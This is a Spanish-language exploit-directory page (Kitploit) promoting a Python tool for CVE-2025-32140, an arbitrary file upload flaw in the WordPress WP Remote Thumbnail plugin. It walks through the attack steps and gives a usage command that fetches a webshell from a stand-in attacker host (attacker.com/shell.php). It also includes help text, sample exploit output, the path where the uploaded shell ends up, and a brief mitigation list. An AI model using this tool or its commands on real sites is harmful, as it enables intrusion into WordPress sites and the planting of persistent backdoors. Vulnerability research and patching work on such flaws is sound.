Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/nxploited/cve-2025-32140
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 es vulnerable a la subida arbitraria de archivos.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2025-32140 – Explotación de WP Remote Thumbnail (Carga Arbitraria de Archivos)


📝 Descripción

CVE-2025-32140 es una vulnerabilidad crítica en el plugin WP Remote Thumbnail para WordPress. Permite a atacantes autenticados (con permisos de colaborador o superiores) cargar archivos arbitrarios, como webshells, abusando de una funcionalidad defectuosa que acepta URL sin sanear.

El plugin no valida el tipo de archivo ni el contenido obtenido de la URL remote_thumb proporcionada. Esto permite a los atacantes guardar archivos PHP maliciosos (p. ej., backdoors) en el directorio /wp-content/uploads.


⚠️ Componente Vulnerable

  • Plugin: WP Remote Thumbnail
  • Versiones Vulnerables: <= 1.3.2
  • Versión Parcheada: Aún no publicada
  • Vector de Ataque: Red
  • Privilegios Requeridos: Bajo (Usuario autenticado con capacidad edit_post)
  • Puntuación CVSS: 9.9 (Crítica)

🛠 Script de Explotación

Este script de Python automatiza la explotación de CVE-2025-32140, realizando los siguientes pasos:

  1. Inicia sesión en el sitio WordPress objetivo.
  2. Extrae automáticamente los nonces requeridos.
  3. Construye y envía una solicitud maliciosa mediante el parámetro remote_thumb.
  4. Carga una webshell en el sitio objetivo.

🔧 Opciones de Línea de Comandos


🚀 Uso

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 Uso y Ayuda

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 Ejemplo de Salida

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 Ubicación de la Shell

Una vez explotada, la webshell cargada probablemente se almacenará en:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

Reemplace YYYY/MM con el año y mes actuales de la carga.


🛡 Recomendaciones

Para mitigar el riesgo que plantea esta vulnerabilidad:

  1. Actualice el plugin a la última versión (una vez que se publique un parche).
  2. Restrinja las capacidades de carga de archivos solo a usuarios de confianza.
  3. Desactive la función de obtención de miniaturas remota si no es necesaria.

⚠️ Aviso Legal

Este script se proporciona únicamente con fines educativos.
El autor no es responsable del mal uso o de los daños causados por este exploit.


👤 Autor

Por: Nxploited ( Khaled Alenazi ) 🌟

Descargar herramienta
OpciónAliasDescripción
--url-uURL del sitio WordPress objetivo (p. ej., http://target.com/wordpress)
--username-unNombre de usuario de WordPress con privilegios de edición de entradas
--password-pContraseña del usuario especificado
--user_ID-uidID de usuario de WordPress (normalmente 1 para administrador)
--post_ID-pidID de la entrada a editar (puede ser un borrador)
--shellURL directa a una webshell PHP alojada en el servidor del atacante